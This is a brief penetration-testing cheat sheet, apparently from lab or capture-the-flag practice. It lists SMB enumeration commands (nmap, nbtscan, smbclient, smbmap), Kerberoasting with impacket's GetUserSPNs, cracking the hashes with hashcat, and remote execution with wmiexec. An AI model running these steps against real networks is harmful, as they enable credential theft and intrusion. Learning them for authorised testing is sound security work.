SMB Enumeration

bash


# nmap check for smb open
nmap -v 139,445 -oG smb.txt 192.168.50.1-254

# nmap enum with nse
ls /usr/share/nmap/scripts/smb*
nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152

# nbtscan to query NetBIOS names of services
sudo nbtscan -r 192.168.50.0/24/

smbclient -L ip -u user

powershell

net view \\dc01 /all

SMB retrieve flag

smbmap -d active.htb -u SVC_TGS -p password -H 10.10.10.100

GetUserSPNs from impacket

python getUserSPNs.py -outputfile file.txt -dc-ip 10.10.10.100 ‘domain/User:pass’

# than crack hash with hashcat -m 13100

use wmiexec.py if you get credentials